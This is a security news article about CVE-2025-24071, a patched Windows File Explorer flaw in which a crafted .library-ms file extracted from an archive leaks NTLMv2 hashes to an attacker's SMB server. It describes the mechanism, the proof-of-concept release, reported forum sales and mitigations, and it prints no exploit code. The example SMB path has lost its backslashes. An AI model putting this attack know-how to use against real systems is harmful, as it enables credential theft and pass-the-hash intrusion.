A significant vulnerability has been uncovered in Windows File Explorer, identified as CVE-2025-24071, which poses a serious risk by allowing attackers to extract NTLM hashed passwords with minimal user interaction. This flaw, which has been classified as high-severity, was demonstrated through a proof-of-concept exploit released by security researchers. Microsoft promptly addressed the issue in its March 2025 updates.
Microsoft Windows File Explorer Vulnerability
This vulnerability, referred to as “NTLM Hash Leak via RAR/ZIP Extraction,” takes advantage of Windows Explorer’s automatic file processing capabilities. When a specially crafted .library-ms file containing a malicious SMB path is extracted from a compressed archive, Windows Explorer automatically parses its contents to generate previews and index metadata. Notably, this processing occurs without the user needing to explicitly open the extracted file.
The .library-ms file format, which is XML-based and trusted by Windows Explorer for defining library locations, includes a tag that directs to an attacker-controlled SMB server, as noted by the security researcher known as “0x6rss.” Upon extraction, Windows Explorer attempts to resolve the embedded SMB path (for example, 192.168.1.116shared) automatically to gather metadata. This action inadvertently triggers an NTLM authentication handshake from the victim’s system to the attacker’s server, resulting in the leakage of the victim’s NTLMv2 hash without any user interaction.
Using process monitoring tools, researchers observed that immediately after extraction, both Explorer.exe and SearchProtocolHost.exe—components of Windows’ indexing service—perform several operations on the .library-ms file:
- CreateFile: Automatically opening the file
- ReadFile: Accessing the file contents
- QueryBasicInformationFile: Extracting metadata
- CloseFile: Finalizing the file processing
Wireshark captures confirm that these actions trigger SMB communication attempts, including an NTLM authentication handshake.
| Risk Factors | Details |
| Affected Products | Microsoft Windows (specifically Windows File Explorer) |
| Impact | – Leaks victim’s NTLMv2 credentials, enabling pass-the-hash attacks – Potential for offline NTLM hash cracking – Creates a spoofing vulnerability |
| Exploit Prerequisites | – User must extract a specially crafted .library-ms file – Attacker needs to set up an SMB server to receive the authentication request |
| CVSS 3.1 Score | 7.5 (Important) |
PoC Exploitation
This vulnerability exposes sensitive information to unauthorized parties, facilitating network spoofing attacks. On March 16, 2025, the researcher known as 0x6rss published a proof-of-concept exploit on GitHub, which includes a Python script capable of generating the malicious .library-ms file with a straightforward command: python poc.py.
Evidence suggests that this vulnerability may have been exploited in the wild prior to its public disclosure. A threat actor named “Krypt0n,” who is reportedly behind the malware known as “EncryptHub Stealer,” allegedly offered the exploit for sale on underground forums. Translated posts from the attacker reveal that they explained how to set up a local server, such as on a VPS, to capture the hashes sent from the victim’s machine. They noted that simply opening Explorer or accessing a shared folder would trigger an automatic redirect, sending the user’s hash to the attacker’s server.
Mitigation
Microsoft has addressed this vulnerability with the March 2025 Patch Tuesday updates released on March 11. All Windows users are strongly encouraged to apply these security updates without delay. This vulnerability adds to a growing list of NTLM-related issues identified in Microsoft products, with previous similar credential-leaking vulnerabilities found in applications like Microsoft Access and Publisher.
Security experts recommend that users keep all Microsoft products updated and implement additional protections against NTLM relay attacks, such as enabling SMB signing and disabling NTLM wherever feasible.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
